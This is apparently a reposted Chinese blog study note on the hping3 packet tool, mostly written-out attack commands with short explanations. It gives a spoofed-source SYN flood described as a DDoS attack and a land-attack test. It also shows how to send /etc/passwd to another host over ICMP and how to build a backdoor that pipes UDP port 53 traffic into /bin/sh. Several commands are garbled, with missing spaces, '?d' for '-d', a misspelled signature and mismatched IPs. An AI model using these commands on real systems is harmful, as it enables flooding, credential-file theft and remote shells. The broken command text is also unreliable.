Hping3学习稿

来源:互联网 发布:阿里云邮服务器地址 编辑:程序博客网 时间:2024/03/29 20:54

Hping3用于生成和解析TCP/IP协议数据包。Nmap团队也开发一款类似的工具Nping,集成在了Nmap中。

1、防火墙测试

      hping3 -S -c 1000000 -a 10.10.10.10 -p 2110.10.10.10

以LandAttack方式测试目标防火墙(Land Attack是将发送源地址设置为与目标地址相同,诱使目标机与自己不停地建立连接)

http://0daysecurity.com/articles/hping3_examples.html

2、端口扫描

      虽然Hping3可以进行端口扫描,但是我们并不推荐,所以不给出例子,学习可以参考Nmap学习笔记

3、Idle扫描

      Idle扫描(Idle Scanning)是一种匿名扫描远程主机的方式,该方式也是有Hping3的作者Salvatore Sanfilippo发明的,目前Idle扫描在Nmap中也有实现。

  该扫描原理是:寻找一台idle主机(该主机没有任何的网络流量,并且IPID是逐个增长的),攻击端主机先向idle主机发送探测包,从回复包中获取其IPID。冒充idle主机的IP地址向远程主机的端口发送SYN包(此处假设为SYN包),此时如果远程主机的目的端口开放,那么会回复SYN/ACK,此时idle主机收到SYN/ACK后回复RST包。然后攻击端主机再向idle主机发送探测包,获取其IPID。那么对比两次的IPID值,我们就可以判断远程主机是否回复了数据包,从而间接地推测其端口状态。

4、DDoS攻击

      hping3 -I eth0 -a 192.168.10.99 -S192.168.10.33 -p 80 -i u1000

      对目标机发起大量SYN连接,伪造源地址为192.168.10.99,并使用1000微秒的间隔发送各个SYN包。其他攻击如smurf、teardrop、land attack等也很容易构建出来。

5、发送文件

在接收端开启服务:

hping3 192.168.1.159--listensignature --safe  --icmp

监听ICMP包中的签名,根据签名解析出文件内容。在发送端使用签名打包的ICMP包发送文件:

hping3192.168.1.108--icmp ?d 100 --sign signature --file /etc/passwd

将/etc/passwd密码文件通过ICMP包传给192.168.10.44主机。发送包大小为100字节(-d 100),发送签名为signature(-signsignature)。

6、木马功能

在本地打开53号UDP端口(DNS解析服务)监听来自192.168.10.66主机的包含签名为signature的数据包,并将收到的数据调用/bin/sh执行。

  在木马启动端:

hping3192.168.10.66--listen signature --safe --udp -p 53 |/bin/sh

  在远程控制端:

echols >test.cmd

hping3192.168.10.44 -p53 -d 100 --udp --sign siganature --file ./test.cmd

  将包含ls命令的文件加上签名signature发送到192.168.10.44主机的53号UDP端口,包数据长度为100字节。

 

 

0 1
原创粉丝点击